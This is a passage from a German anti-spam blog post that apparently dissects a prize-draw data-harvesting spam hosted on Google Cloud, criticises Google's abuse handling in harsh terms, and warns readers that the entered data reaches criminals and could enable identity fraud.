Comment:        Complaints sent to any other POC will be ignored.
$ _

…in der Google-Cloud gehostet. Vom Schreiben einer Abuse-Mail an Google sehe ich ab, da sich dies in der Vergangenheit immer wieder als fruchtlose Zeitverschwendung erwiesen hat, und auf die Extraportion Kafka in den angegebenen Meldeformularen verzichte ich nach ebenfalls reichlich gemachten Erfahrungen gern. Beides scheint direkt nach /dev/null zu gehen, ohne dass sich noch ein Mensch damit beschäftigt. Google hat leider kein erkennbares Interesse an der Bekämpfung von Spam und Internetkriminalität. Vermutlich ist Google zu stark damit beschäftigt, seine Suchmaschine und sein YouTube durchzuzensieren. Google will sein Geschäft machen, und die Kosten und Aufwände, die bei seinem Geschäft anfallen, will Google höchst asozial der ganzen restlichen Welt aufbürden. Das ist genau der stinkende Charakter, der Menschen mit weniger Kapital zu asozialen Spammern macht, und es ist genau so widerlich. Google ist damit ein guter und zuverlässiger Freund von Kriminellen aller Art geworden, vom schäbigen Vorschussbetrüger aus Nigeria bis hin zum hier vorliegenden Datensammler, Adresshändler und mutmaßlich auch Affiliate-Lumpenkaufmann, der seinen Opfern sicherlich auch schnell weitere große Nachteile als „Gewinnchancen“ aufdrängeln wird, wenn sie bei diesem Köder angebissen haben. 🎣️

Die Daten, die man dort eingibt, um eine Chance auf einen möglichen Gewinn zu haben, gehen direkt an Kriminelle. Sie sind für einen betrügerischen Identitätsmissbrauch ausreichend. Der Ärger, den man sich in nur einer Minute dummen Klickens und Tippens holen kann, wird von der sehr überschaubaren „Gewinnchance“ – es ist nicht bekannt, wann die Verlosung stattfindet, wie viele Teilnehmer es gibt und unter welchen Umständen sie einfach ausfallen könnte, so dass ich davon ausgehe, dass da im Zweifelsfall gar nichts verlost wird – nicht aufgewogen. 💩️

Am meisten Glück haben die Menschen, die diese Spam einfach löschen. 🍀️

INSERT FOOTER HERE

Ach ja, warum sollte der Spammer sich Mühe geben. Wenn er sich Mühe geben wollte, könnte er ja gleich arbeiten gehen. 🛠️

Entf! 🗑️